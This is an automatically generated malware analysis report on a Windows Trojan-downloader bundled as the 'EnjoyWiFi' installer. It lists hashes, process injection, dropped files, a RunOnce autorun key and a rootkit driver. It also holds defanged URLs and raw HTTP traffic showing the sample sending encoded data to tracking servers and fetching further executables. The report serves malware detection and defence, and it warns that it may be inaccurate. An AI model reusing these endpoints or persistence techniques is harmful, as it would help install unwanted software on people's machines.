Gen.Variant.Razy.150085_98e911dd01

by malwarelabrobot on October 10th, 2017 in Malware Descriptions.

Trojan-Downloader.Win32.Adload.qajs (Kaspersky), Gen:Variant.Razy.150085 (B) (Emsisoft), Gen:Variant.Razy.150085 (AdAware), Installer.Win32.InnoSetup.FD, Installer.Win32.InnoSetup.2.FD, mzpefinder_pcap_file.YR, InstallerInnoSetup.YR (Lavasoft MAS)
Behaviour: Trojan-Downloader, Trojan, Installer


The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.

Requires JavaScript enabled!

Summary
Dynamic Analysis
Static Analysis
Network Activity
Map
Strings from Dumps
Removals

MD5: 98e911dd016cd8140af8b956c4c3d772
SHA1: 8ea828233579f6d0a88a72143968af58c65c8cde
SHA256: c07120a8e5da5aa4e7630f808c1ab151c7a9d5b4a88a781ecbe706ba7ca5283d
SSDeep: 6144:42RdRrzUnUObUvlhOMKQeyziAbf/Ggog:xz/BlKQBziAbHL
Size: 320000 bytes
File type: EXE
Platform: WIN32
Entropy: Not Packed
PEID: MicrosoftVisualC, NETexecutable, UPolyXv05_v6
Company: no certificate found
Created at: 2017-10-03 13:11:59
Analyzed on: Windows7 SP1 32-bit


Summary:

Trojan-Downloader. Trojan program, which downloads files from the Internet without user's notice and executes them.

Payload

No specific payload has been found.

Process activity

The Trojan creates the following process(es):

csc.exe:2736
csc.exe:1596
csc.exe:2384
setup.4.15.f.exe:1656
enjoyWIFI.exe:892
enjoyWIFI.exe:4004
enjoyWIFI.exe:3396
cvtres.exe:4000
cvtres.exe:576
cvtres.exe:1376
enjoyWIFI.tmp:1056
starter.exe:1084

The Trojan injects its code into the following process(es):

%original file name%.exe:644
enjoyWIFI.tmp:2584
Explorer.EXE:284

Mutexes

The following mutexes were created/opened:
No objects were found.

File activity

The process csc.exe:2736 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\watsy17_.dll (4304 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\watsy17_.out (396 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\CSC114E.tmp (652 bytes)

The Trojan deletes the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\CSC114E.tmp (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\RES114F.tmp (0 bytes)

The process csc.exe:1596 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\th69dtpb.out (396 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\th69dtpb.dll (2490 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\CSC1074.tmp (652 bytes)

The Trojan deletes the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\RES1075.tmp (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\CSC1074.tmp (0 bytes)

The process csc.exe:2384 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\CSC29F.tmp (652 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\jard5ttz.out (396 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\jard5ttz.dll (3662 bytes)

The Trojan deletes the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\RES2A0.tmp (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\CSC29F.tmp (0 bytes)

The process setup.4.15.f.exe:1656 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsdA2E4.tmp\System.dll (23 bytes)
%Program Files%\EnjoyWiFi\inst.db (5 bytes)
%Program Files%\EnjoyWiFi\x86\wfcre.sys (2480 bytes)
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\EnjoyWiFi\uninstall EnjoyWiFi.lnk (978 bytes)
%Program Files%\EnjoyWiFi\enjoywifi.ssf (4768 bytes)
%Program Files%\EnjoyWiFi\x64\wfcre.sys (5589 bytes)
%Program Files%\EnjoyWiFi\wfcrecf.dll (5260 bytes)
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\EnjoyWiFi\EnjoyWiFi.lnk (995 bytes)
C:\Windows\System32\drivers\wfcre.sys (3616 bytes)
C:\Users\Public\Documents\XMUpdate\conf.db (507 bytes)
%Program Files%\EnjoyWiFi\uninst.exe (5166 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsdA2E4.tmp\wftinst.dll (29506 bytes)
C:\Users\Public\Desktop\EnjoyWiFi.lnk (977 bytes)
%Program Files%\EnjoyWiFi\EnjoyWiFi.exe (22850 bytes)
%Program Files%\EnjoyWiFi\wftinst.dll (14753 bytes)
%Program Files%\EnjoyWiFi\zlib.dll (925 bytes)

The Trojan deletes the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsdA2E4.tmp (0 bytes)
%Program Files%\EnjoyWiFi\x64 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsdA2E4.tmp\System.dll (0 bytes)
%Program Files%\EnjoyWiFi\x86 (0 bytes)
%Program Files%\EnjoyWiFi\x86\wfcre.sys (0 bytes)
%Program Files%\EnjoyWiFi\x64\wfcre.sys (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsnA2D3.tmp (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsdA2E4.tmp\wftinst.dll (0 bytes)

The process %original file name%.exe:644 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\11f03f3e47a7458cb81a3a1441eae3c0\starter.exe (185379 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\th69dtpb.out (455 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\th69dtpb.cmdline (388 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\watsy17_.cmdline (388 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\jard5ttz.0.cs (676 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\jard5ttz.out (455 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\watsy17_.out (455 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\513488b4c2f64a4a9f5a9d95e2668ace\enjoyWIFI.exe (202246 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\watsy17_.0.cs (1444 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\th69dtpb.0.cs (5572 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\66c296f3ee214b3e99a092c71c51c3c0\enjoyWIFI.exe (205485 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\jard5ttz.cmdline (388 bytes)

The Trojan deletes the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\watsy17_.dll (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\watsy17_.out (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\th69dtpb.out (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\th69dtpb.cmdline (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\watsy17_.tmp (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\watsy17_.cmdline (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\jard5ttz.0.cs (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\watsy17_.err (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\th69dtpb.err (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\th69dtpb.dll (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\jard5ttz.out (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\jard5ttz.tmp (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\jard5ttz.err (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\watsy17_.0.cs (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\th69dtpb.tmp (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\th69dtpb.0.cs (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\jard5ttz.cmdline (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\jard5ttz.dll (0 bytes)

The process enjoyWIFI.exe:892 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\00005786\setup.4.15.f.exe (2 bytes)

The Trojan deletes the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\00005786\setup.4.15.f.exe (0 bytes)

The process enjoyWIFI.exe:4004 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\is-RP795.tmp\enjoyWIFI.tmp (1832 bytes)

The process enjoyWIFI.exe:3396 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\is-5R9LT.tmp\enjoyWIFI.tmp (1832 bytes)

The Trojan deletes the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\is-5R9LT.tmp\enjoyWIFI.tmp (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\is-5R9LT.tmp (0 bytes)

The process cvtres.exe:4000 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\RES114F.tmp (3666 bytes)

The process cvtres.exe:576 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\RES1075.tmp (3666 bytes)

The process cvtres.exe:1376 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\RES2A0.tmp (3658 bytes)

The process enjoyWIFI.tmp:2584 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\is-Q5NGO.tmp\_isetup\_RegDLL.tmp (4 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\is-Q5NGO.tmp\HelpTool.dll (8020 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\is-Q5NGO.tmp\_isetup\_shfoldr.dll (47 bytes)

The process enjoyWIFI.tmp:1056 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\is-J9PPA.tmp\_isetup\_shfoldr.dll (47 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\is-J9PPA.tmp\_isetup\_RegDLL.tmp (4 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\is-J9PPA.tmp\HelpTool.dll (8020 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\is-J9PPA.tmp\enjoyWIFI.exe (15262 bytes)

The Trojan deletes the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\is-J9PPA.tmp\HelpTool.dll (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\is-J9PPA.tmp\_isetup\_shfoldr.dll (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\is-J9PPA.tmp\enjoyWIFI.exe (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\is-J9PPA.tmp (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\is-J9PPA.tmp\_isetup (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\is-J9PPA.tmp\_isetup\_RegDLL.tmp (0 bytes)

The process starter.exe:1084 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\InstallationConfiguration.xml (2242 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\installer.dat (667 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\rsl2960.tmp (1 bytes)

Registry activity

The process setup.4.15.f.exe:1656 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\upm]
"app" = "4B E8 E3 9B FD 1F 55 BF DE BA AF 90 5C B8 C7 EA"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{8948C1BE-92B8-4276-8803-DC71CC78203A}]
"DisplayIcon" = "%Program Files%\EnjoyWiFi\EnjoyWiFi.exe"
"InstallLocation" = "%Program Files%\EnjoyWiFi"
"UninstallString" = "%Program Files%\EnjoyWiFi\uninst.exe"

[HKLM\SOFTWARE\Microsoft\SystemSettings\Fetcher]
"01" = "E3 72 9B 4B 6C 70 5D 09 F5 23 83 45 5D 8F 8B C8"

[HKLM\System\CurrentControlSet\services\wfcre\Parameters]
"374335773" = "E6 74 6B 0B 6B CB 39 68 A7 72 AE 03 26 C2 2B 40"

[HKLM\System\CurrentControlSet\services\wfcre]
"Group" = "PNP_TDI"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{8948C1BE-92B8-4276-8803-DC71CC78203A}]
"DisplayName" = "EnjoyWiFi"

[HKLM\System\CurrentControlSet\services\wfcre]
"Start" = "1"

The process %original file name%.exe:644 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Tracing\98e911dd016cd8140af8b956c4c3d772_RASMANCS]
"FileDirectory" = "%windir%\tracing"
"FileTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\98e911dd016cd8140af8b956c4c3d772_RASAPI32]
"ConsoleTracingMask" = "4294901760"
"EnableConsoleTracing" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\98e911dd016cd8140af8b956c4c3d772_RASMANCS]
"MaxFileSize" = "1048576"
"EnableConsoleTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\98e911dd016cd8140af8b956c4c3d772_RASAPI32]
"FileDirectory" = "%windir%\tracing"

[HKLM\SOFTWARE\Microsoft\Tracing\98e911dd016cd8140af8b956c4c3d772_RASMANCS]
"EnableFileTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\98e911dd016cd8140af8b956c4c3d772_RASAPI32]
"EnableFileTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\98e911dd016cd8140af8b956c4c3d772_RASMANCS]
"ConsoleTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\98e911dd016cd8140af8b956c4c3d772_RASAPI32]
"FileTracingMask" = "4294901760"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"

[HKLM\SOFTWARE\Microsoft\Tracing\98e911dd016cd8140af8b956c4c3d772_RASAPI32]
"MaxFileSize" = "1048576"

To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:

[HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce]
"%original file name%.exe" = "c:\%original file name%.exe"

The Trojan deletes the following value(s) in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
"IntranetName"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

The process enjoyWIFI.tmp:1056 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\enjoyWifi]
"TmN" = "51499"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"

[HKCU\Software\enjoyWifi\actv]
"(Default)" = ""

[HKCU\Software\enjoyWifi]
"TmSN" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"

The Trojan deletes the following value(s) in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
"IntranetName"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

The process starter.exe:1084 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Tracing\starter_RASMANCS]
"ConsoleTracingMask" = "4294901760"
"EnableConsoleTracing" = "0"
"FileTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\starter_RASAPI32]
"MaxFileSize" = "1048576"
"FileDirectory" = "%windir%\tracing"

[HKLM\SOFTWARE\Microsoft\Tracing\starter_RASMANCS]
"EnableFileTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\starter_RASAPI32]
"EnableFileTracing" = "0"
"ConsoleTracingMask" = "4294901760"
"FileTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\starter_RASMANCS]
"FileDirectory" = "%windir%\tracing"
"MaxFileSize" = "1048576"

[HKLM\SOFTWARE\Microsoft\Tracing\starter_RASAPI32]
"EnableConsoleTracing" = "0"

Dropped PE files

MD5 File path
764b1ff923126715e2b443a3a4c155f7 c:\Program Files\EnjoyWiFi\EnjoyWiFi.exe
6fa4163081ad4a38e405c169ea361ff1 c:\Program Files\EnjoyWiFi\uninst.exe
497648a5cbdd6baba950f93d3f5353fc c:\Program Files\EnjoyWiFi\wfcrecf.dll
68b4e74c33aaf425c9782f922eb927e9 c:\Program Files\EnjoyWiFi\wftinst.dll
c7d4d685a0af2a09cbc21cb474358595 c:\Program Files\EnjoyWiFi\zlib.dll
b1010a49c62837b6ca320600e9e2c784 c:\Users\"%CurrentUserName%"\AppData\Local\Temp\11f03f3e47a7458cb81a3a1441eae3c0\starter.exe
588001502c10b32dd0c16f200e4bdc7d c:\Users\"%CurrentUserName%"\AppData\Local\Temp\66c296f3ee214b3e99a092c71c51c3c0\enjoyWIFI.exe
0c4eb503e6c1774acb6c5de66aa02d6c c:\Windows\System32\drivers\wfcre.sys

HOSTS file anomalies

No changes have been detected.

Rootkit activity

Using the driver "%System%\drivers\wfcre.sys" the Trojan controls loading executable images into a memory by installing the Load image notifier.
Using the driver "%System%\drivers\wfcre.sys" the Trojan controls operations with a system registry by installing the registry notifier.

Propagation

VersionInfo

Company Name:
Product Name:
Product Version: 4.5.2.0
Legal Copyright:
Legal Trademarks:
Original Filename: kenpachi.exe
Internal Name: kenpachi.exe
File Version: 4.5.2.0
File Description:
Comments:
Language: Bulgarian (Bulgaria)

PE Sections

Name Virtual Address Virtual Size Raw Size Entropy Section MD5
.text 8192 210052 210432 4.92745 72ab14fda51f4f40052a0f5513525e86
.sdata 221184 744 1024 4.06311 6c8ee4f3664e76aa13f44adca1513bd0
.rsrc 229376 106916 107008 2.4096 69466494369f14e51d18fcfcf0912eb2
.reloc 344064 12 512 0.070639 d7113ebf74cab35b179666341c1fae44

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

URLs

URL IP
hxxp://freegeoip.net/xml/ 104.31.10.172
hxxp://room1.360dev.info/black/mirenda/3/default/UA.xml 164.132.203.119
hxxp://room1.360dev.info/black/prisonbreak/3/default.xml 164.132.203.119
hxxp://publishcontroller.cloudapp.net/download/APSnapdoAMRev
hxxp://g5k6t6n2.ssl.hwcdn.net/apdata/installers/auto/exe/girafe.exe
hxxp://360devtraking.website/temptrack/Store 94.23.173.69
hxxp://yeawindows.com/enjoyWiFi/enjoyWIFI.exe 128.1.162.234
hxxp://linkury-bumbleb-statisticsservice-westeurope.cloudapp.net/StateStatisticsService.svc/V1/JSON/GetDistributorIdFromNameHttpGet?distributorName=APSnapdoAMRev
hxxp://linkury-webcomponents-westeurope.cloudapp.net/MaxMind.asmx/GetGeoInfo
hxxp://publishcontroller.cloudapp.net/Update/CheckInstallConfig?deviceid=3815defc-8d53-7691-634e-7d5250b86812&distributer=APSnapdoAMRev&channelid=3&barcodeid=50027003&country=UA&encrypt=True
hxxp://linkury-bumbleb-statisticsservice-westeurope.cloudapp.net/StatisticsService.svc/V1/JSON/Lee
hxxp://cs9.wpc.v0cdn.net/apdata/installers/installer/installers-config/snapdo-ap/apsnapdoamrev/ic170817.xml
hxxp://int.dpool.sina.com.cn/iplookup/iplookup.php 180.149.138.197
hxxp://jk.yeawindows.com/reportInstallaa.aspx?NUQ0Q0RDNzlDNUFCQjQ2Njc2QTg5M0JCNUNEODRCQzFFMDNDNkEwOTU2Njk4RjhCOEMyRjk5MTJFOTA4Rjk1REJCQjlERkJGRUYzNkI1NDY5RkNEMDk4REFFNTZBQUNCRjFBMEEwMkZCMDhFRDBBN0IwRDZBRjc5MkJBRTE0QjM2QkNDMjBEMDI5NEQyMUM3Q0Y5RUM0RUQ1QTYzMEJGQUFGMUE3NEJCQTFFMDIzMjJBRTIxMEY1MUI3MjRGRDIxMTNCNDE1Nzc5ODUzQ0UyQ0Q4MUI3NkYyQ0Y5NjVEQkM= 23.234.26.217
hxxp://jk.yeawindows.com/anzhuang.aspx?NUQ0Q0RDNzlDNUFCQjQ2Njc2QTg5M0JCNUNEODRCQzFFMDNDNkEwOTU2Njk4RjhCOEMyRjk5MTJFOTA4Rjk1REMzMEMyQUY0ODJBOUQ3MTg2MURCQTk3RDAwMkEyRTM4OTNGRDEzMDE5MzU0OTQyMjlDMDhBMzMxNzVDNDE3RUY= 23.234.26.217
hxxp://jk.yeawindows.com/jihuo.aspx?NUQ0Q0RDNzlDNUFCQjQ2Njc2QTg5M0JCNUNEODRCQzFFMDNDNkEwOTU2Njk4RjhCOEMyRjk5MTJFOTA4Rjk1RERBMDNBNzQ2REI4RUVEOTlEMDk0MTE5NjQyNTZCREVERTc1ODgxQjlDRTUxNUQwMDRERjFFOUUxQzQ5OURENEQ1RkUyNkFGOTQ2Nzg1OEU4NUU4QTJCN0U5RjhFQkU5NUZCODFGMEMxODUwNTc4OERDRjc1OEY0RjVDRDNCOUZF 23.234.26.217
hxxp://jk.yeawindows.com/jihuo.aspx?NUQ0Q0RDNzlDNUFCQjQ2Njc2QTg5M0JCNUNEODRCQzFFMDNDNkEwOTU2Njk4RjhCOEMyRjk5MTJFOTA4Rjk1RERBMDNBNzQ2REI4RUVEOTlEMDk0MTE5NjQyNTZCREVERTc1ODgxQjlDRTUxNUQwMDRERjFFOUUxQzQ5OURENERGMjAwNDUyODA2NThCRjhGNDUyOTVCRTNCNUY1MDk3QTFBMEJEMDIyNDZFNkIxQTgxMDdENTg1REQ4RDZCOTFC 23.234.26.217
hxxp://stats.utyuytjn.com/StatisticsService.svc/V1/JSON/Lee 65.52.144.78
hxxp://updates.utyuytjn.com/Update/CheckInstallConfig?deviceid=3815defc-8d53-7691-634e-7d5250b86812&distributer=APSnapdoAMRev&channelid=3&barcodeid=50027003&country=UA&encrypt=True 52.174.148.190
hxxp://install.rgbcjfir.com/download/APSnapdoAMRev 52.174.148.190
hxxp://svc-stats.linkury.com/StateStatisticsService.svc/V1/JSON/GetDistributorIdFromNameHttpGet?distributorName=APSnapdoAMRev 65.52.144.78
hxxp://cdn.ijnewhb.com/apdata/installers/installer/installers-config/snapdo-ap/apsnapdoamrev/ic170817.xml 93.184.221.200
hxxp://madmax.utyuytjn.com/MaxMind.asmx/GetGeoInfo 65.52.153.196
hxxp://cdn.piytrwd.com/apdata/installers/auto/exe/girafe.exe 205.185.208.154


IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

ET POLICY PE EXE or DLL Windows file download HTTP
ET POLICY External IP Lookup sina.com.cn
ET MALWARE Double User-Agent (User-Agent User-Agent)
ET SHELLCODE Possible TCP x86 JMP to CALL Shellcode Detected
ET TROJAN VMProtect Packed Binary Inbound via HTTP - Likely Hostile

Traffic

GET /reportInstallaa.aspx?NUQ0Q0RDNzlDNUFCQjQ2Njc2QTg5M0JCNUNEODRCQzFFMDNDNkEwOTU2Njk4RjhCOEMyRjk5MTJFOTA4Rjk1REJCQjlERkJGRUYzNkI1NDY5RkNEMDk4REFFNTZBQUNCRjFBMEEwMkZCMDhFRDBBN0IwRDZBRjc5MkJBRTE0QjM2QkNDMjBEMDI5NEQyMUM3Q0Y5RUM0RUQ1QTYzMEJGQUFGMUE3NEJCQTFFMDIzMjJBRTIxMEY1MUI3MjRGRDIxMTNCNDE1Nzc5ODUzQ0UyQ0Q4MUI3NkYyQ0Y5NjVEQkM= HTTP/1.1
Content-Length: 0
Connection: Close
User-Agent: User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36
Host: jk.yeawindows.com


HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Mon, 09 Oct 2017 10:15:01 GMT
Connection: close
Content-Length: 0



POST /temptrack/Store HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 360devtraking.website
Content-Length: 224
Expect: 100-continue
Accept-Encoding: gzip
Connection: Keep-Alive


HTTP/1.1 100 Continue
....




order="/LsQENRBY8s/42Z7hB2hIbbJOrFHSz783Guu2YFsHqg/jPQP1pu3sTGpb0Hj/e8
DguO5h2QIypjgMLA7XWg5Qowugf4yiepz11dwTzHOeHv nKas3GqVD5RXfKTFCs4xLJI2Z
xzbqjvyDRSpao W9gry8u2qUlmorA7HIPEd15I7F9lLp iZUj3BZkVdDH4aEf8r3 2b9O1
jL1rLzzRT1A=="

HTTP/1.1 200 OK


Server: nginx/1.10.1 (Ubuntu)
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Cache-Control: no-cache
X-RateLimit-Limit: 60
X-RateLimit-Remaining: 59
Date: Mon, 09 Oct 2017 10:13:39 GMT
Content-Encoding: gzip
14........................0..



GET /StateStatisticsService.svc/V1/JSON/GetDistributorIdFromNameHttpGet?distributorName=APSnapdoAMRev HTTP/1.1
Host: svc-stats.linkury.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 13
Content-Type: application/json; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Mon, 09 Oct 2017 10:13:45 GMT
{"d":"50027"}HTTP/1.1 200 OK..Cache-Control: no-cache..Pragma: no-cach
e..Content-Length: 13..Content-Type: application/json; charset=utf-8..
Expires: -1..Server: Microsoft-IIS/7.5..X-AspNet-Version: 4.0.30319..X
-Powered-By: ASP.NET..Date: Mon, 09 Oct 2017 10:13:45 GMT..{"d":"50027
"}..



GET /iplookup/iplookup.php HTTP/1.1
Content-Length: 0
Connection: Close
User-Agent: User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36
Host: int.dpool.sina.com.cn


HTTP/1.1 200 OK
Server: Sina
Date: Mon, 09 Oct 2017 10:14:09 GMT
Content-Type: text/html; charset=gbk
Content-Length: 20
Connection: close
DPOOL_HEADER: tyr106
Set-Cookie: INTDPOOL=cb85cb75f7eb9cc5f37b34f3a3b7fb7e;Path=/
DPOOL_LB7_HEADER: skuld144
1.-1.-1...............



POST /StatisticsService.svc/V1/JSON/Lee HTTP/1.1
Content-Type: application/json; charset=utf-8
dataType: json
Host: stats.utyuytjn.com
Content-Length: 1694
Expect: 100-continue
Connection: Keep-Alive


HTTP/1.1 100 Continue
....




{"request":"0631462230990081771352540191321201192020260030102222210091
2822304323112919010107711002711117025007110610709420608505023719314805
6004057081120213032078203009192226127096078213170137216113245024078093
0061341211191062391630470432080711072490250652140881271302152211591681
7324404906313115003706817008006601218713421501620719805002713117624001
5043110151162143165039211105202161193205052130108122003140074166047033
0850550490150541512180700381791721472080041810920191112300060702382420
0516403115511223202715315415716111920511324905201323014814515708614716
4241254099073134029113173081069043065018032063180205049080170005001214
1120290691411921360860131100371921111320801420211881410011370892210762
4620507718218419206914211016801316705110302706608102818617007410821815
0004155018116175057022167242043232111222003244139170153187194126205012
1351001781611730250060950090261161650822332430411400381430521322451100
2816908215207017204605511106817613423500219722004413323311709116010413
7124248160042158049201003017011039234048194137117054167054134052051148
1061670980512400240021760830141551170732442301300782211150502500990591
4802625316421125211821414002620220413619506508411413814509909311501823
2156059167149174196005100145156137007207190217118130128078117133025102
2252080440512112310382430620172040280151030951872310481871811412352241
0618109407724505220621617416100413420514313820303202007319404924901704
6045165079253028128004154006068030083140022101190231035070034030146121
116054170167040056230044224211087123145114200192070093159186242147
<<< skipped >>>
HTTP/1.1 200 OK


Cache-Control: private
Content-Length: 10
Content-Type: application/json; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Mon, 09 Oct 2017 10:13:45 GMT
{"d":"OK"}HTTP/1.1 200 OK..Cache-Control: private..Content-Length: 10.
.Content-Type: application/json; charset=utf-8..Server: Microsoft-IIS/
7.5..X-AspNet-Version: 4.0.30319..X-Powered-By: ASP.NET..Date: Mon, 09
 Oct 2017 10:13:45 GMT..{"d":"OK"}....


POST /StatisticsService.svc/V1/JSON/Lee HTTP/1.1


Content-Type: application/json; charset=utf-8
dataType: json
